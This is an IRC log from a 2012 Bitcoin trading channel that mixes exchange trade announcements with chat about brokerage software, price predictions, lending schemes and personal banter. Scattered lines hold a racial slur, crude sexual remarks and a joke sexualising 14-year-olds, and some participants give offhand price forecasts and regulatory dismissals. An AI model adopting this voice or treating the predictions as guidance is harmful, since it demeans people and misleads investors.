BTC [+] Aug 16 08:53:38 MoneyIsDebt: because i agreed to be on MPEX Aug 16 08:53:47 someone was supposed to setup a broker site to MPEX Aug 16 08:53:51 so you could trade MPEX+GLBSE Aug 16 08:53:56 but SOMEONE never finished it Aug 16 08:54:11 besides, glbse is all mining bonds Aug 16 08:54:13 lol someone is like i dun remember, 6 ppl ? Aug 16 08:54:14 shit is useless Aug 16 08:54:35 azelphur did most of the work Aug 16 08:54:39 he just never finished it Aug 16 08:54:49 if i had skill i'd finish it Aug 16 08:54:50 :D Aug 16 08:54:50 jurov was working on it too Aug 16 08:54:51 but i don ot Aug 16 08:54:53 i think he's on vacations\ Aug 16 08:55:19 i dont understand why no one has finished it Aug 16 08:55:21 and there more i duno recall right off Aug 16 08:55:24 theres basically free money for the taking Aug 16 08:55:25 whoever does it Aug 16 08:55:33 yes. Aug 16 08:55:36 [GLBSE] [ASICMINER] 18 @ 0.105 = 1.89 BTC [+] Aug 16 08:55:38 even if you made $100/wk Aug 16 08:55:39 rg: because I got scared, I really don't like the idea of handling large amounts of money Aug 16 08:55:39 i think many people lack the discipline. Aug 16 08:55:40 it'd be worth it Aug 16 08:55:43 it's the sorta thing I'd loose sleep over lol Aug 16 08:55:46 or that. Aug 16 08:55:58 yeah, this is not peanuts, like "o i made an apple app with crows" Aug 16 08:55:58 what money Aug 16 08:55:59 so Aug 16 08:56:03 this is... you fuck up, you're on the hook Aug 16 08:56:03 you shoulda still finished it Aug 16 08:56:06 and let someone else run it Aug 16 08:56:10 for... 10k btc, 150k usd, your house. ouch. Aug 16 08:56:10 and took a cut from the profit Aug 16 08:56:22 you're thinking too short term/small picture man Aug 16 08:56:31 that's the problem with bitcoin, no one is thinking big picture Aug 16 08:56:44 so much money for the taking Aug 16 08:56:46 MoneyIsDebt check this out for instance Aug 16 08:56:46 and no one is taking it Aug 16 08:56:50 http://trilema.com/2012/mpex-devtalk/http://trilema.com/2012/mpex-devtalk/ Aug 16 08:56:53 at least mircea is getting a piece of the action Aug 16 08:57:02 he basically opened up a whole new venue for people to grab a piece too Aug 16 08:57:03 rg: I'm getting plenty :) Aug 16 08:57:03 but no one has Aug 16 08:57:10 Azelphur: small picture, again Aug 16 08:57:15 nou Aug 16 08:57:59 bah that was fucked up wtf. Aug 16 08:57:59 http://trilema.com/2012/mpex-devtalk/ Aug 16 08:58:09 shrug Aug 16 08:58:12 if you dont want money Aug 16 08:58:14 dont take it Aug 16 08:58:17 someone else will, eventually Aug 16 08:58:29 I'd be interested Aug 16 08:58:46 But I have the same concerns as Azelphur - handling ppls money securely Aug 16 08:59:08 rg : to be honest i think the right way to start is something like brendio is doing (maybe smickles was doing it too i dont recall) : brokerage services. Aug 16 08:59:13 no site, no automation, old style. Aug 16 08:59:26 heck, back in the 1990s i used to CALL my broker, or drop by his office Aug 16 08:59:31 and we'd trade via telex ffs. Aug 16 08:59:32 [GLBSE] [YABMC] 2 @ 0.118 = 0.236 BTC [+] Aug 16 08:59:43 mircea_popescu: But then, why not use opentransactions or something Aug 16 09:00:10 im not familiar with that project Aug 16 09:00:12 past knowing it exists. Aug 16 09:00:37 [MPEX] [S.MPOE] 17698 @ 0.00038668 = 6.8435 BTC [-] Aug 16 09:01:01 jee the mrket is punishing me for my ignorance ? Aug 16 09:01:07 have mercy i r but human! Aug 16 09:01:33 mircea_popescu: I'm about to cash out a bit :p Aug 16 09:01:44 what, you had money ? Aug 16 09:01:45 so what's the state of the brokerage code at the moment? Aug 16 09:01:45 need some money since I kinda went on a shopping spree lol Aug 16 09:02:11 MoneyIsDebt huh ? Aug 16 09:02:28 if I wanted to finish it Aug 16 09:02:35 is it available? Aug 16 09:02:41 i don't think anyone released anything. Aug 16 09:02:46 ok Aug 16 09:02:47 well, Azelphur released a python bot Aug 16 09:02:55 what was it, pympex ? on git ? Aug 16 09:03:06 well, I've already made a frontend for glbse Aug 16 09:03:12 haha, that's just a very simple library that won't do a whole lot for an exchange Aug 16 09:03:13 o ? can we see it ? Aug 16 09:03:15 I haven't looked at the mpex api Aug 16 09:03:37 there's no mpex api in that sense. you have to pipe gpg strings in that's all. Aug 16 09:03:39 MoneyIsDebt: it's difficult to work with Aug 16 09:03:47 ^ indeed Aug 16 09:03:53 and after you do the first read, it just wipes all the data Aug 16 09:04:04 i have azelphurs exchange Aug 16 09:04:11 but i wouldnt give it out without permission Aug 16 09:04:14 Azelphur hm ? Aug 16 09:04:15 i only have it in a vm backup Aug 16 09:04:18 hehe Aug 16 09:04:24 i saved his vm image before i wiped it Aug 16 09:04:33 Don't give me anything yet Aug 16 09:04:35 at least i think i still have it Aug 16 09:04:40 there is a good chance i do not Aug 16 09:04:42 Since I'm potentially working on a competing product Aug 16 09:04:52 yea, I don't particularly want it handed out because people tend not to understand what "no support" means Aug 16 09:05:02 I don't want to be encumbered with copyright issues, unless it's really up for grabs Aug 16 09:05:03 every time I give something out that is unfinished as no support, people pummel me with questions Aug 16 09:05:06 well Money, i dont think it really competes Aug 16 09:05:09 considering he gave up Aug 16 09:05:11 and its unfinished Aug 16 09:05:11 yea Aug 16 09:05:23 What language did you use? Aug 16 09:05:29 it won't really be of any use to anyone, if someone is going to make an exchange they may as well do it from scratch Aug 16 09:05:31 python/django Aug 16 09:05:38 cool Aug 16 09:05:47 i liked it Aug 16 09:05:49 [MPEX] [S.MPOE] 44778 @ 0.00038668 = 17.3148 BTC [-] Aug 16 09:05:50 [MPEX] [S.MPOE] 62200 @ 0.00038369 = 23.8655 BTC [-] Aug 16 09:05:52 [MPEX] [S.MPOE] 53818 @ 0.00037945 = 20.4212 BTC [-] Aug 16 09:05:53 [MPEX] [S.MPOE] 30200 @ 0.00037831 = 11.425 BTC [-] Aug 16 09:05:54 [MPEX] [S.MPOE] 58675 @ 0.00037597 = 22.06 BTC [-] Aug 16 09:05:54 i was going to pay to have GLBSE do MPEX natively Aug 16 09:05:55 [MPEX] [S.MPOE] 3870 @ 0.00037532 = 1.4525 BTC [-] Aug 16 09:05:56 [MPEX] [S.MPOE] 33600 @ 0.00037487 = 12.5956 BTC [-] Aug 16 09:05:57 [MPEX] [S.MPOE] 12859 @ 0.00037445 = 4.8151 BTC [-] Aug 16 09:05:57 but nefario is all Aug 16 09:05:57 yea it was nice, maybe one day I'll rack up the courage to go back to it Aug 16 09:05:57 no Aug 16 09:05:59 im going to china Aug 16 09:06:04 my real life is more important than IRC life Aug 16 09:06:05 bla bla Aug 16 09:06:14 ........ Aug 16 09:06:18 hahaha what ?! Aug 16 09:06:23 wtf is everyone going to china for ? Aug 16 09:06:30 misc. reasons Aug 16 09:06:31 it's cheaper to import the hos. Aug 16 09:06:36 Government leaves you alone apparently Aug 16 09:06:36 :D Aug 16 09:06:41 You have some guts approriating yourself the life of others Aug 16 09:06:47 Harvey00 the COMMUNIST govt leaves you alones ? Aug 16 09:06:49 communist china - land of the free Aug 16 09:06:49 If you want a government that will leave you alone Aug 16 09:06:52 jesus x what did the us come to. Aug 16 09:06:54 Go to South America Aug 16 09:06:58 too bad the US went to hell Aug 16 09:06:59 Luceo or romania. Aug 16 09:07:03 The government might be communist but its incompetent Aug 16 09:07:04 liberty wise Aug 16 09:07:12 mircea_popescu: Yeah or Romania, Bulgaria, Hungary good too Aug 16 09:07:23 Farming communities secede from the Chinese government all the time. Aug 16 09:07:24 I might move to Romania, you guys have fast Internet and fine ladies :D Aug 16 09:07:29 or the czech republic, serbia Aug 16 09:07:34 China is more American than America at its core. Aug 16 09:07:37 heck, you can take the girls for a nude walk in the street there Aug 16 09:07:40 nobody gives a shit. Aug 16 09:07:45 Yeah Chinese government doesn't give a fuck what you do as long as you dont' attack them Aug 16 09:08:03 Luceo no joke on either score. romania interwebz is like top 5 IN THE WERLD. Aug 16 09:08:13 i get 12mbps for like $30 Aug 16 09:08:18 mircea_popescu: I know, and I have a Romanian ex so Aug 16 09:08:22 a Aug 16 09:08:24 well then. Aug 16 09:08:26 where you from ? Aug 16 09:08:26 I know Romania wins on the other count too ;) Aug 16 09:08:28 mircea_popescu: lol Aug 16 09:08:31 12mb inside romania Aug 16 09:08:33 Switzerland Aug 16 09:08:35 I got bored of women after playing pua for too long. Aug 16 09:08:35 1mb/512k to anywher eelse Aug 16 09:08:36 rg nope. Aug 16 09:08:54 i talk to my server at 32mpbs lol. how do you think i donwload all my meals. Aug 16 09:09:02 we pay like $50/mo Aug 16 09:09:04 and get 2MB/sec Aug 16 09:09:06 you wouldn't download a steak Aug 16 09:09:09 and 600KB/sec up Aug 16 09:09:14 not without sauce i wouldn't. Aug 16 09:09:31 Harvey00 i never got into that entire pua thing, seems so stupid. Aug 16 09:09:41 I get 200Mbit/40Mbit for about $70/m Aug 16 09:09:47 22% [=======> ] 23,798,327 2.78M/s eta 27s Aug 16 09:10:14 mircea_popescu: The principle of it is to be confident. anyways, yeah it's stupid because there's more to life. Aug 16 09:10:28 that's not my objection even, i am confident by nature and experience. Aug 16 09:10:37 BUT why the fuck am i talking to random idiots based on how they look ? Aug 16 09:10:41 mme.honv.tar.gz ~ D/L: 21,996.4 kbps Aug 16 09:10:41 dude, i need clever women. Aug 16 09:10:58 i need some espresso Aug 16 09:11:00 I need to stop being so nihilistic and depressed. Aug 16 09:11:03 it's about 100x more efficient to just let my blog filter them out. Aug 16 09:11:05 i got to get some work done tonight Aug 16 09:11:11 mircea_popescu: :D Aug 16 09:11:13 i have been slacking Aug 16 09:11:18 i need to FINISH Aug 16 09:11:19 the god damn Aug 16 09:11:20 Also bitdaytrade is offering trading on margin Aug 16 09:11:21 bitvps website Aug 16 09:11:23 rg you need a pet. Aug 16 09:11:27 Watch the market go wacky with gamblers. Aug 16 09:11:30 well im moving to england soon Aug 16 09:11:33 so im ot getting a pet Aug 16 09:11:33 mircea_popescu: I need a pet Aug 16 09:11:37 I should get a kitten Aug 16 09:11:39 im already pissed i cant bring my fucking plants Aug 16 09:11:45 im selling pets, nice tits, great ass, 10k btc a pop. Aug 16 09:11:47 lifetime. Aug 16 09:11:50 shit is fucking gay Aug 16 09:11:55 i spent so much time on these plants Aug 16 09:11:58 now i cant even bring them Aug 16 09:12:12 rg : make them salad, eat them right before you go to airport. Aug 16 09:12:16 stick it to the man. Aug 16 09:12:17 theyre not food Aug 16 09:12:40 Copyright ©2012 Bitdaytrade ltd. << is this a wannabe bitcoinica ? Aug 16 09:12:47 its james' desert plant collection Aug 16 09:12:58 theres a haworthia attenunata Aug 16 09:13:00 a cactus Aug 16 09:13:05 and another cactus Aug 16 09:13:08 cactus makes great salad. Aug 16 09:13:14 the cactus might die Aug 16 09:13:15 Cactus makes good beer Aug 16 09:13:18 i rescued it Aug 16 09:13:20 i mighta been too late Aug 16 09:13:28 and it's called attenuata Aug 16 09:13:32 rg: When you come to Europe, go to Brussels Aug 16 09:13:40 And visit a bar called Delirium Aug 16 09:13:47 ya rg, you couldbuy handmade lace for your nigger ass there! Aug 16 09:13:48 They sell about 1600 different beers Aug 16 09:13:53 and 400 absinthes Aug 16 09:14:28 Luceo i know some guy who went into some bar like that with x beers. they had a gallon cup thing Aug 16 09:14:33 and he ordered a shot of each beer. Aug 16 09:14:40 like 200+ lmao Aug 16 09:14:50 mircea_popescu: Delirium have a 2 liter cup, I know that much :P Aug 16 09:14:52 lol Aug 16 09:15:11 I go there about every 2 months, great fun Aug 16 09:15:25 maybe it was 2liter, i recall but vaguely. Aug 16 09:16:31 And yeah the relevance was Aug 16 09:16:35 Delirium sell cactus beer Aug 16 09:16:52 Which I forgot to mention because I'm sleep deprived Aug 16 09:17:05 i just slept 10 hours or so Aug 16 09:17:18 im fresh as a newborn babe. Aug 16 09:17:35 ~_~ I havent slept 10h in the last 48 Aug 16 09:18:25 and before that i took a 4 hr nap Aug 16 09:18:56 and in between the nap and the sleep i had excellent sweet&sour pork and my toes suckled. Aug 16 09:19:07 .... Aug 16 09:19:08 the life of a btc financier is fraught with danger. Aug 16 09:19:13 peril Aug 16 09:19:21 and horrors diverse. Aug 16 09:19:28 that is disgusting. Aug 16 09:19:40 [GLBSE] [OBSI.HRPT] 1 @ 0.10435 BTC [+] Aug 16 09:19:41 don't knock it till you've had it, i say. Aug 16 09:19:50 [MPEX] [F.GIGA.ETF] 8700 @ 0.00112586 = 9.795 BTC [-] Aug 16 09:19:50 [MPEX] [F.GIGA.ETF] 3400 @ 0.0011183 = 3.8022 BTC [-] Aug 16 09:20:19 BitDayTrade is for losers, nevermind Aug 16 09:20:25 The site doesn't even bloody work Aug 16 09:20:38 Harvey00: hes a troll, dont worry Aug 16 09:20:49 Harvey00 go get margin on mpex eh. Aug 16 09:21:02 If I knew how to work that bloody thing. Aug 16 09:21:31 haha. just use Azelphur's python tool srsly. Aug 16 09:21:46 will google Aug 16 09:21:55 hm Aug 16 09:22:09 confirmations taking 351235435234 years \o/ Aug 16 09:22:10 https://github.com/Azelphur/pyMPEx Aug 16 09:22:26 mircea_popescu: want some ebay laughs? :P Aug 16 09:22:32 sure Aug 16 09:22:47 mircea_popescu: https://www.dropbox.com/sh/x1btb0c9w9futq4/3mEOQEpIEW Aug 16 09:22:55 "new" "perfect condition" "comes with box and earphones!" Aug 16 09:23:02 lol Aug 16 09:23:10 someone showed me a destructified one just yest Aug 16 09:23:12 also from ebay Aug 16 09:23:19 I especially love the lockscreen, they didn't give me the password Aug 16 09:23:33 no wait, i think it was you lol Aug 16 09:23:33 I already won that though, I have the phone and the money Aug 16 09:23:38 so it's like "what now bitch" Aug 16 09:23:44 :P Aug 16 09:24:03 I'm not gonna drop to his level though, I told him if he pays shipping he can have it back. Aug 16 09:24:07 Azelphur authored 12 days ago < o hey, still maintained ? Aug 16 09:24:23 mircea_popescu: yea, smickles made a pull request Aug 16 09:24:45 a Aug 16 09:25:04 ya, add smickles to the list of people who are making a brokerage site. Aug 16 09:25:12 that's 3, but im pretty sure there were more Aug 16 09:25:22 course some musta quit i guess Aug 16 09:25:28 i use pympex pretty much exclusively Aug 16 09:25:32 :D Aug 16 09:25:49 I need to reg on mpex at some point Aug 16 09:25:57 woo my nexus 7 has left the depot for delivery Aug 16 09:25:59 go postman, go. Aug 16 09:26:08 Luceo better sooner than later lol. Aug 16 09:26:11 Im still waiting for my cheap Korean keyboard Aug 16 09:26:20 to replace this shitty $150 mechanical keyboard >_< Aug 16 09:26:25 xD Aug 16 09:26:31 >shitty Aug 16 09:26:33 >mechanical Aug 16 09:26:36 wat Aug 16 09:26:45 I saw a keyboard the other day that seriously tempted me to buy it Aug 16 09:26:48 Diablo-D3: Steelseries 7 Aug 16 09:26:50 it had a couple issues which put me offt hough Aug 16 09:26:50 It's junk Aug 16 09:26:55 oh Aug 16 09:26:56 Diablo-D3: i heard you ruined all the mining bonders days Aug 16 09:27:05 !ticker dmc Aug 16 09:27:06 Luceo: that company produces shit Aug 16 09:27:06 http://www.youtube.com/watch?feature=player_embedded&v=3AbwJON7ECk Aug 16 09:27:08 and for that, i thank you for the lulz Aug 16 09:27:08 dont buy from them Aug 16 09:27:08 shits tempting as hell Aug 16 09:27:14 [GLBSE:DMC] [Bid: 0.063] [Ask: 0.079] [Spread: 0.016] [Last: 0.079] [24hVol: 93.018791] [7dAvg: 0.05644972] Aug 16 09:27:14 rg: well it was an accident Aug 16 09:27:16 but, not mechanical, and no API for the LCD from what I can see Aug 16 09:27:17 Diablo-D3: Yes, they do Aug 16 09:27:20 owow it went up. Aug 16 09:27:21 and no Linux support, and expensive Aug 16 09:27:26 Luceo: theres like three keyboards worth owning Aug 16 09:27:31 Diablo-D3: did you post a statement? Aug 16 09:27:31 but it looks kickass...I wants it :( Aug 16 09:27:39 Diablo-D3: Qsenn DT-35, best keyboard ever Aug 16 09:27:40 rg what did he do anyway ? Aug 16 09:27:43 And they're about $10 :P Aug 16 09:27:44 also where is DMC's p/l statement? Aug 16 09:28:02 rg: I didnt personally destroy bonds Aug 16 09:28:07 I used asicminer to do it Aug 16 09:28:18 tell me and mircea what happened Aug 16 09:28:20 wasnt that deadterra's ?! Aug 16 09:28:21 and now they're forced to trade me 15mh per dmc Aug 16 09:28:24 ya srsly lol Aug 16 09:29:08 ;;lube assbot Aug 16 09:29:09 Error: "lube" is not a valid command. Aug 16 09:29:14 I think Im going to start a motion to not pay dividends for the next few months as well Aug 16 09:29:15 you don't know what life is, gribs. Aug 16 09:29:37 just so I can buy the market. all of it. Aug 16 09:29:46 what market ? Aug 16 09:30:32 mircea Aug 16 09:30:34 is this illegal: Aug 16 09:30:43 can i give large share holders free VPS's ? Aug 16 09:31:17 I think that'd be dumb if it was illegak Aug 16 09:31:20 illegal* Aug 16 09:31:29 But you never know with the government Aug 16 09:31:30 i don't see why'd it be illegal. Aug 16 09:31:34 im just making sure Aug 16 09:31:41 Luceo he means illegal in the mpex sense of that term. Aug 16 09:31:42 how can i prove people actually hold bitvps shares? Aug 16 09:31:47 yeah Aug 16 09:31:49 mircea_popescu: Ohhh! Aug 16 09:31:51 i dont give a shit about the government Aug 16 09:31:58 rg you can't really check. Aug 16 09:32:00 im already breaking SEC regulations by even being listed on MPEX Aug 16 09:32:15 i just dont want to make 'the management' angry Aug 16 09:32:22 unless they show you STATs. Aug 16 09:32:30 easly faked Aug 16 09:32:31 but even so, why'd you want to do that ? Aug 16 09:32:32 =/ Aug 16 09:32:38 uhh Aug 16 09:32:41 cause i love my share holders Aug 16 09:32:49 they're anon. Aug 16 09:32:49 they gave me a lot of money Aug 16 09:32:54 for not that much in return Aug 16 09:32:57 so id like to make them happy? Aug 16 09:33:00 is THAT a crime? Aug 16 09:33:12 yes. just make them money. happyness is what women are for. Aug 16 09:33:27 women are not worth the hassle more than half the time Aug 16 09:33:31 I need to update prices Aug 16 09:33:32 AGAIN Aug 16 09:33:34 -_- Aug 16 09:33:38 what prices ? Aug 16 09:33:38 anyone who binds their happiness to a woman is missing out Aug 16 09:33:48 VPS prices Aug 16 09:33:50 didn't know you swung the other way rg. Aug 16 09:33:56 Bitcoin keeps shooting up :< Aug 16 09:33:56 Luceo you run a vps too ? Aug 16 09:33:57 i dont swing the other way Aug 16 09:34:04 mircea_popescu: Yeah Aug 16 09:34:08 Yes, you undeserving business man. You're not shark enough! That's a crime according to the business entourage. Aug 16 09:34:31 They'll judge and sentence you according to their laws. Aug 16 09:34:46 BTC-Mining dun be a hater, this is the digital fronteer. Aug 16 09:35:01 I'm not serious eh Aug 16 09:35:14 lol Aug 16 09:35:26 unseriousness is illegal. Aug 16 09:35:36 bitcoin iz srs bzns. Aug 16 09:35:47 jesus fuck we're over 13 ?! Aug 16 09:35:59 ;;ticker Aug 16 09:35:59 Best bid: 13.19993, Best ask: 13.19994, Bid-ask spread: 0.00001, Last trade: 13.19994, 24 hour volume: 73786, 24 hour low: 12.29, 24 hour high: 13.45 Aug 16 09:36:04 i feel like im 12 again and every morning i wake up to a new party. Aug 16 09:36:11 Aye... lots of asks being added Aug 16 09:36:16 but even more bids Aug 16 09:36:30 was as high as 13.45 fo reals. Aug 16 09:37:04 That's over 1/3rd than the bubble at it's high Aug 16 09:37:10 except growth is much slower... Aug 16 09:37:22 I hope it goes back down by quite a bit eventually however Aug 16 09:37:23 i honestly think we'll prolly close the year ~20 Aug 16 09:37:33 and we'll never see under 10 ever again. Aug 16 09:38:09 that past is forever closed in a crypt of awesome, and we'll just reminesce about it. Aug 16 09:38:14 Well, transactions amount have raised overall. What was thought of as a fad that would go away at the turn of the first bubble actually survived quite well. Aug 16 09:38:36 $25 by year end Aug 16 09:38:39 yup. and the rewards are halving Aug 16 09:38:39 It's still a fast changing, small economy, but the outlook isn't bad for bitcoins Aug 16 09:38:47 That too. Aug 16 09:38:49 that is the key factor i think. Aug 16 09:39:50 i imagine by 2015 everyone is trading in milibtc Aug 16 09:39:59 and we'll be thought of as titans, like the people with the 10k btc pizza. Aug 16 09:40:11 50 BTC x 6/hour x 24 h = 7200 generated daily Aug 16 09:40:30 BTC-Mining the point nobody understands is inflation. Aug 16 09:40:42 on a 7mn base 7k generated daily is like 40% inflation yoy. Aug 16 09:40:55 the prices holding their ground in those conditions is unheard of irl. Aug 16 09:40:57 [MPEX] [O.BTCUSD.P170N] 1 @ 0.56779392 BTC [-] Aug 16 09:40:58 We'lll be the BTCilderberg Group? :P Aug 16 09:41:00 countries with 40% year inflation flounder. Aug 16 09:41:08 That's about 1/10th of MtGox volume too Aug 16 09:41:16 Luceo not you, the rest of us. the ppl with money. Aug 16 09:41:18 :D Aug 16 09:41:23 :o Aug 16 09:41:26 I has money :P Aug 16 09:41:31 Once inflation is halved and less miners sell, it might gain more value. Aug 16 09:41:37 way faster. Aug 16 09:41:43 that's the thing, rewards double Aug 16 09:41:51 3600 added to a 13mn base is now more like usd inflation was Aug 16 09:41:57 back in the 90s when that economy worked still Aug 16 09:42:03 Its k each of these BTC are going to be worth like Aug 16 09:42:07 $1m one day Aug 16 09:42:09 np :D Aug 16 09:42:18 Nah... Aug 16 09:43:09 We'd need a 21 trillion market cap with all bitcoins generated for that. Aug 16 09:43:21 i doubt 1mn really. i guess we'll see more like 20k tops. Aug 16 09:43:26 in our lifetimes. Aug 16 09:44:15 the thing is, on thw face of it 21 trn seems doable, what, the world gdp is about there. Aug 16 09:44:27 BUT most of that gdp is fake. the touch of btc will shring it to nothing. Aug 16 09:44:40 the us gdp is not even 1 trn in bitcoin-convertible usd. Aug 16 09:46:24 I think probably $1k is achievable Aug 16 09:46:30 Above that may be difficult Aug 16 09:46:39 But I'll still be a multi-millionaire if we hit $1k so Aug 16 09:46:42 Sounds good to me Aug 16 09:47:29 .py 10^9 * 0.003 * 10^3 Aug 16 09:47:31 TypeError: unsupported operand type(s) for ^: 'int' and 'float' Aug 16 09:47:34 aww! Aug 16 09:47:45 .py 10**9 * 0.003 * 10**3 Aug 16 09:47:46 3000000000.0 Aug 16 09:48:03 hey, billionaire! Aug 16 09:49:56 Hmm, I wouldnt quite be there :P Aug 16 09:50:32 yet ;) Aug 16 09:51:43 i used a very conservative mpex share multiplyer of 10x. Aug 16 09:52:01 considering it went like 4x since april... Aug 16 09:55:47 there we go, cashed out $900 Aug 16 09:59:27 I got in with ~$2400 and got 800 BTC, first time around Aug 16 10:01:41 haha my first buy was 1k usd for 60 btc **** BEGIN LOGGING AT Thu Aug 16 10:23:15 2012 Aug 16 10:23:29 Canada is a weird thing. Aug 16 10:24:01 [MPEX] [S.MPOE] 23200 @ 0.0003965 = 9.1988 BTC [+] Aug 16 10:24:26 The first 10 securities that sold shares in value of 100BTC will get their registation fees of 10BTC reimbursed. Aug 16 10:24:28 Has the USA's hat, it seems to be influenced a lot by their systems. Yet it does a lot of "un-sucky" things on the other side. Aug 16 10:24:44 As the USA's hat* Aug 16 10:25:22 it does a lot of sucky things too. imo it's the unfortunate bastard of the us and europe Aug 16 10:25:28 has inherited the stupidities of both. Aug 16 10:25:51 its not anonymous Aug 16 10:25:54 i mean, in england you can't own guns and the policeman can't ask for your id Aug 16 10:25:58 in canada you can't own guns. Aug 16 10:26:04 and theyre rewriting it cause the bitcoind src is garbage Aug 16 10:26:11 in the us you have freedom of speech and everyone is stupid-liberal. Aug 16 10:26:12 bitcoind hasnt gotten any better Aug 16 10:26:17 in canada everyone is stupid-liberal. Aug 16 10:26:18 etc. Aug 16 10:26:19 w ehave all these new features Aug 16 10:26:24 and the client still BLOWS Aug 16 10:26:48 cause bitcoin-dev would rather argue about BIP-124958252752752 Aug 16 10:26:51 than get anything real done Aug 16 10:27:24 did you finish your site rg Aug 16 10:27:29 or are just arguing about bitcoin-d Aug 16 10:27:46 i havent even started Aug 16 10:27:50 i just washed my fce mask off Aug 16 10:28:13 im going to an annual cook out this weekend Aug 16 10:28:16 at a friends Aug 16 10:28:16 your. im sorry, your face mask ? Aug 16 10:28:19 and there is prime stockto fucking Aug 16 10:28:29 so my skin has to look nice Aug 16 10:28:42 i dont have sex much Aug 16 10:28:43 but when i do Aug 16 10:28:44 dude the day i wear face masks to get laid... Aug 16 10:28:46 its at this bbq Aug 16 10:28:53 umm Aug 16 10:28:55 its not to get lid Aug 16 10:29:01 its to clear up my face and make it look nice Aug 16 10:29:06 so i can trick a girl into having sex with me Aug 16 10:29:52 not all of us can have silky smooth, blemish free skin Aug 16 10:30:37 my face ain't silk smooth. Aug 16 10:30:44 besides i got a beard half the time Aug 16 10:31:02 [GLBSE] [YABMC] 4 @ 0.118 = 0.472 BTC [+] Aug 16 10:31:14 so you have nasty skin under your beard Aug 16 10:31:18 i cant grow a beard Aug 16 10:31:58 i dont have nasty skin lol. Aug 16 10:32:08 i have man skin. not silky who knows what not nasty, just human. Aug 16 10:32:39 [MPEX] [S.BVPS] 725 @ 0.00375196 = 2.7202 BTC [+] Aug 16 10:32:42 jesus god what is happening to this worl;d Aug 16 10:33:02 well Aug 16 10:33:04 im irish Aug 16 10:33:08 [MPEX] [S.MPOE] 5109 @ 0.0003965 = 2.0257 BTC [+] Aug 16 10:33:10 and we're pasty white Aug 16 10:33:14 so any imperfections on the skin show up Aug 16 10:33:16 a lot Aug 16 10:33:23 so when i go into public Aug 16 10:33:26 i have to do stuff Aug 16 10:34:18 i thought you were black !? Aug 16 10:34:28 shut your mouth... Aug 16 10:34:29 rg: how about shaving and going out in the sun every now and then? Get some all natural "de-whitening" treatment? Aug 16 10:34:40 nah, i knew an irish lass Aug 16 10:34:43 i cant shave Aug 16 10:34:44 she's shave and go in the sun Aug 16 10:34:46 or else i look 14 Aug 16 10:34:48 and then she'd freckle the fuck up Aug 16 10:35:00 rg hos wanna do 14yo bois all da time. Aug 16 10:35:42 i need a haircut Aug 16 10:35:48 maybe if its not a million degrees out tomorrow ill go get one Aug 16 10:36:12 but srsly, did i ever see a pic of you ? Aug 16 10:37:19 probably Aug 16 10:37:25 its on photobook.bitvps.com Aug 16 10:39:07 [GLBSE] [ASICMINER] 26 @ 0.105 = 2.73 BTC [+] Aug 16 10:39:31 o hey was that there b4 ? i honestly thought you were black! Aug 16 10:39:48 you sly dog you. i wouldn't worry about any blemishes. Aug 16 10:40:16 and where's draco anymore. Aug 16 10:43:05 https://bitcointalk.org/index.php?topic=101012.0 Aug 16 10:43:15 Well I have created a new asset. Aug 16 10:44:58 gl with it. Aug 16 10:45:22 It's not much but eh. Aug 16 10:45:46 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9901 = 3.9604 BTC [-] Aug 16 10:45:47 [GLBSE] [TYGRR.BOND-P] 3 @ 0.99 = 2.97 BTC [-] Aug 16 10:45:49 [GLBSE] [TYGRR.BOND-P] 11 @ 0.99 = 10.89 BTC [-] Aug 16 10:46:05 [MPEX] [S.MPOE] 30781 @ 0.0003965 = 12.2047 BTC [+] Aug 16 10:46:17 [MPEX] [S.MPOE] 18793 @ 0.0003965 = 7.4514 BTC [+] Aug 16 10:47:23 Seems there will need to be a pass-through since it's 100 BTC slices minimum Aug 16 10:47:25 [GLBSE] [ASICMINER] 25 @ 0.105 = 2.625 BTC [+] Aug 16 10:48:35 i thought he paid 1% a week, where's 2.25 from ? Aug 16 10:49:39 Target and maximum return Aug 16 10:49:50 Although contract states 9/10th of current rate Aug 16 10:50:23 It's not his deposits operation, he created a new fund. Aug 16 10:50:43 o Aug 16 10:50:59 [GLBSE] [MPOE.ETF] 1 @ 1.5 BTC [+] Aug 16 10:51:43 I'll add a note about that in the thread I guess Aug 16 10:56:30 [MPEX] [F.GIGA.ETF] 4600 @ 0.00112585 = 5.1789 BTC [+] Aug 16 10:56:31 [MPEX] [F.GIGA.ETF] 2100 @ 0.00113125 = 2.3756 BTC [+] Aug 16 10:56:33 [MPEX] [F.GIGA.ETF] 1271 @ 0.00113657 = 1.4446 BTC [+] Aug 16 10:58:11 Where are all these lending operations getting their profits from? Silk road customers paying 10% weekly interest, or? Aug 16 10:59:07 MoneyIsDebt this is unclear. Aug 16 10:59:22 i know some people lend to forum users, sorta consumer/retail loans Aug 16 10:59:27 but they seem insanely high risk to me. Aug 16 10:59:45 yes, high risk, but also expensive for the borrower Aug 16 11:00:04 I guess if you're addicted to drugs and need to buy on SR you'd agree to those rates Aug 16 11:00:30 I can't see many other reasons to take expensive bitcoin loans , especially now that the prices are skyrocketing Aug 16 11:01:47 i would have expected honestly to see daisychain defaults in the banks Aug 16 11:02:06 seeing how at the rates they charge a 2x increase in btc/usd means prolly 50x default increase. Aug 16 11:03:10 tbh kludge is the most vulnerable i would guess, he got hit by an undisclosed loss in the owens case, if he also has a pile of toxic debt and the people start flooding out of his pirate passthrough thing... Aug 16 11:03:20 course this is all speculation. Aug 16 11:03:44 [GLBSE] [FOO.PPPPT] 3 @ 1.0499 = 3.1497 BTC [+] Aug 16 11:03:46 [GLBSE] [FOO.PPPPT] 10 @ 1.05 = 10.5 BTC [+] Aug 16 11:03:47 [GLBSE] [FOO.PPPPT] 2 @ 1.05 = 2.1 BTC [+] Aug 16 11:04:25 maybe lenders are simply shorting bitcoin Aug 16 11:04:36 but they must be in trouble these days... Aug 16 11:04:50 if they were shorting bitcoin i'd see a lot more hedging volume on options. Aug 16 11:05:25 [GLBSE] [CPA] 20 @ 0.095 = 1.9 BTC [-] Aug 16 11:05:26 my honest oppinion is that this is mostly citizen banking. people playing around. Aug 16 11:05:47 could be Aug 16 11:06:06 pirate is playing bigtime though ;) Aug 16 11:06:21 [GLBSE] [PUREMINING] 9 @ 0.1499 = 1.3491 BTC [+] Aug 16 11:06:22 [GLBSE] [PUREMINING] 2 @ 0.15 = 0.3 BTC [+] Aug 16 11:06:23 [GLBSE] [PUREMINING] 14 @ 0.154 = 2.156 BTC [+] Aug 16 11:06:51 not everyone is equally responsible. Aug 16 11:06:58 take 30 kids to the seaside Aug 16 11:07:09 ten will play on the beach, twenty in the water Aug 16 11:07:12 of which one will drown. Aug 16 11:13:28 [GLBSE] [TYGRR.BOND-P] 2 